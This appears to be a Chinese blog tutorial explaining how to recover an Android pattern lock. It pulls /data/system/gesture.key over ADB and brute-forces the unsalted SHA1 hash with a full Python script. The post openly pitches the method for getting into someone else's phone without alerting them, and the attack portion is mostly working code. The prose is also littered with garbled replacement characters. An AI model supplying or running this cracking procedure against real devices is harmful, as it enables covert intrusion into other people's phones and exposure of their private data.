安卓手機的圖形鎖是3x3的點陣����,按次序連接數(shù)個點從而達到鎖定/解鎖的功能�。最少需要連接4個點,最多能連接9個點�。網(wǎng)上也有暴力刪除手機圖形鎖的方法,即直接干掉圖形鎖功能����。但假如你想進入別人的手機,但又不想引起其警覺的話……你可以參考一下本文(前提條件:手機需要root����,而且打開調(diào)試模式。一般來講�����,如果用過諸如“豌豆莢手機助手”����、“360手機助手”一類的軟件�����,都會被要求打開調(diào)試模式的����。如果要刪除手機內(nèi)置軟件����,則需要將手機root)。
那么這幾個點的排列順序是這樣的:00 03 06 07 08。 系統(tǒng)就記下來了這一串數(shù)字�����,然后將這一串數(shù)字(以十六進制的方式)進行SHA1加密�,存儲在了手機里的/data/system /gesture.key 文件中。我們用數(shù)據(jù)線連接手機和電腦�,然后ADB連接手機,將文件下載到電腦上(命令:adb pull /data/system/gesture.key gesture.key)�����,如圖:
用WinHex等十六進制編輯程序打開gesture.key�����,會發(fā)現(xiàn)文件內(nèi)是SHA1加密過的字符串:c8c0b24a15dc8bbfd411427973574695230458f0�����,如圖:
當你下次解鎖的時候�,系統(tǒng)就對比你畫的圖案����,看對應的數(shù)字串是不是0003060708對應的加密結果����。如果是�,就解鎖;不是就繼續(xù)保持鎖定�����。那么�,如果窮舉所有的數(shù)字串排列,會有多少呢����?聯(lián)想到高中的階乘,如果用4個點做解鎖圖形的話�,就是9x8x7x6=3024種可能性,那5個點就是15120�,6個點的話60480,7個點181440�����,8個點362880����,9個點362880����?���?偣彩?85824種可能性(但這么計算并不嚴密,因為同一條直線上的點只能和他們相鄰的點相連)����。滿打滿算,也不到985824種可能性�����。乍一看很大����,但在計算機面前����,窮舉出來這些東西用不了幾秒鐘。
知道了原理�,就著手寫程序來實現(xiàn)吧。這里使用了Python來完成任務�。主要應用了hashlib模塊(對字符串進行SHA1加密)和itertools模塊(Python內(nèi)置�����,生成00-09的排列組合)����。主要流程為:
# -*- coding: cp936 -*-
import itertools
import hashlib
import time
import os
#調(diào)用cmd����,ADB連接到手機,讀取SHA1加密后的字符串
os.system("adb pull /data/system/gesture.key gesture.key")
time.sleep(5)
f=open('gesture.key','r')
pswd=f.readline()
f.close()
pswd_hex=pswd.encode('hex')
print '加密后的密碼為:%s'%pswd_hex
#生成解鎖序列,得到['00','01','02','03','04','05','06','07','08']
matrix=[]
for i in range(0,9):
str_temp = '0'+str(i)
matrix.append(str_temp)
#將00——08的字符進行排列�����,至少取4個數(shù)排列�����,最多全部進行排列
min_num=4
max_num=len(matrix)
for num in range(min_num,max_num+1):#從04 -> 08
iter1 = itertools.permutations(matrix,num)#從9個數(shù)字中挑出n個進行排列
list_m=[]
list_m.append(list(iter1))#將生成的排列全部存放到 list_m 列表中
for el in list_m[0]:#遍歷這n個數(shù)字的全部排列
strlist=''.join(el)#將list轉換成str。[00,03,06,07,08]-->0003060708
strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#將字符串進行SHA1加密
if pswd_hex==strlist_sha1:#將手機文件里的字符串與加密字符串進行對比
print '解鎖密碼為:',strlist
按說得到解鎖密碼后����,應該break跳出循環(huán)的。但Python沒有跳出多重循環(huán)的語句�����,本想設置標志位然后不停進行判定�����,為了運行速度就免去了這個步驟(有沒有更好的實現(xiàn)跳出多重循環(huán)的方法����?)。另外也略去了很多容錯語句�����。
以上就是本文關于基于Python的Android圖形解鎖程序詳解的全部內(nèi)容����,希望對大家有所幫助。感興趣的朋友可以繼續(xù)參閱本站其他相關專題�����,如有不足之處����,歡迎留言指出。感謝朋友們對本站的支持����!
